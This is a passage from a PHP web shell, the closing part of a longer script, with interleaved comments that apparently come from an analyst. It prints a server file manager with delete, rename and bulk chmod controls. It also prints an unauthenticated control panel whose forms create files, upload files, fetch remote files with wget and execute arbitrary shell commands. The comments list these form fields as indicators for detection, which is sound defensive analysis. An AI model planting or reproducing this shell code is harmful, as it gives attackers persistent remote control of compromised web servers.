  1347. $size = ByteConversion(filesize("$dir/$file"));
  1348. $lastmod = date("F d Y g:i:s", filemtime("$dir/$file"));
  1349. $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION);
  1350. echo "<tr>";
  1351. if(in_array($extension, $compression)) {
  1352. echo "<td><a href='?extract=$dir/$file&epath=$dir&type=$extension'>$file</a></td>";
  1353. } else {
  1354. echo "<td><a href='?edit=$dir/$file'>$file</a></td>";
  1355. }
  1356. echo <<<html
  1357. <td style="text-align: center;">$perms</td>
  1358. <td style="text-align: center;">$writeable</td>
  1359. <td style="text-align: center;">$owner/$group</td>
  1360. <td>$size</td>
  1361. <td>$lastmod</td>
  1362. <td><a href='?delF=$dir/$file'>Delete</a></td>
  1363. <td><a href='?rename=$file&rdir=$dir'>Rename</a></td>
  1364. <td><input type='checkbox' name='massbox[]' value='$dir/$file'></td>
  1365. </tr>
  1366. html;
  1367. }
  // Closes the file table and prints the bulk-action controls: a select named
  // 'action' offering 'delete' and 'chmod', a text field 'chmod_value'
  // pre-filled with '077', and the submit field 'mass_action'. These are the
  // POST fields read by the "Mass Files" handler earlier in the script.
  1368. echo <<<html
  1369. </table>
  1370. </div>
  1371. <div style='position:absolute; right:0%;'>
  1372. <select name='action'>
  1373. <option value='delete'>Delete</option>
  1374. <option value='chmod'>chmod</option>
  1375. </select>
  1376. <input type='text' name='chmod_value' class='text' value='077' size='9'>
  1377. <input type='submit' name='mass_action' value='Do Action'>
  1378. </div>
  1379. </form>
  1380. <br>
  1381. <br>
  1382. <br>
  1383. html;
  1384.  
  // Operator control panel, printed on every request. $writeable is set to a
  // coloured label saying whether $dir is writeable, and the echo below renders
  // seven forms. Their field names are what the handlers earlier in the script
  // look for, which makes them the request-level indicators for this shell:
  //   POST create_file_path + create_file    (create file)
  //   POST create_dir_path + create_dir      (create directory)
  //   GET  edit                              (edit file; handler outside this excerpt)
  //   GET  dir                               (browse; pre-filled with /tmp)
  //   POST upload_dir + upload_file + do_upload (multipart upload)
  //   POST wget_file + do_wget               (remote fetch)
  //   POST command + exe_cmd                 (command execution)
  // None of the forms carries a CSRF token or any authentication field; whether
  // the script checks credentials elsewhere cannot be told from this excerpt.
  1385. if(is_writeable($dir)) {
  1386. $writeable = "<font color='green'><b>[ Writeable ]</b></font>";
  1387. } else {
  1388. $writeable = "<font color='red'><b>[ Not Writeable ]</b></font>";
  1389. }
  1390. echo "<table width='100%' border='1'>
  1391. <tr>
  1392. <td>
  1393. <center>
  1394. <form action='' method='post'>
  1395. Create File:<br>
  1396. <input type='text' name='create_file_path' size='55' value='$dir/newfile.php'>
  1397. <input type='submit' name='create_file' value='Create'><br>
  1398. $writeable
  1399. </form>
  1400. </center>
  1401. </td>
  1402. <td>
  1403. <center>
  1404. <form action='' method='post'>
  1405. Create Directory:<br>
  1406. <input type='text' name='create_dir_path' size='55' value='$dir/newdir'>
  1407. <input type='submit' name='create_dir' value='Create'><br>
  1408. $writeable
  1409. </form>
  1410. </center>
  1411. </td>
  1412. </tr>
  1413. <tr>
  1414. <td>
  1415. <center>
  1416. <form action='' method='get'>
  1417. Edit File:<br>
  1418. <input type='text' name='edit' size='55' value='$dir/index.php'>
  1419. <input type='submit' value='Edit'>
  1420. </form>
  1421. </center>
  1422. </td>
  1423. <td>
  1424. <center>
  1425. <form action='' method='get'>
  1426. Go To Directory:<br>
  1427. <input type='text' name='dir' size='55' value='/tmp'>
  1428. <input type='submit' value='Go'>
  1429. </form>
  1430. </center>
  1431. </td>
  1432. </tr>
  1433. <tr>
  1434. <td>
  1435. <center>
  1436. <form action='' method='post' enctype='multipart/form-data'>
  1437. Upload To Directory:<br>
  1438. <input type='text' name='upload_dir' size='55' value='$dir'><br>
  1439. <input type='file' name='upload_file'>
  1440. <input type='submit' name='do_upload' value='Upload'><br>
  1441. $writeable
  1442. </form>
  1443. </center>
  1444. </td>
  1445. <td>
  1446. <center>
  1447. <form action='' method='post'>
  1448. wget file:<br>
  1449. <input type='text' name='wget_file' size='55' value='http://'>
  1450. <input type='submit' name='do_wget' value='wget'>
  1451. </form>
  1452. </center>
  1453. </td>
  1454. </tr>
  1455. <tr>
  1456. <td colspan='2'>
  1457. <center>
  1458. <form action='' method='post'>
  1459. Execute Command:<br>
  1460. <input type='text' name='command' size='65'>
  1461. <input type='submit' name='exe_cmd' value='Execute'>
  1462. </form>
  1463. </center>
  1464. </td>
  1465. </tr>
  1466. </table>
  1467. <br>
  1468. <br>";
  1469.  
  1470. ?>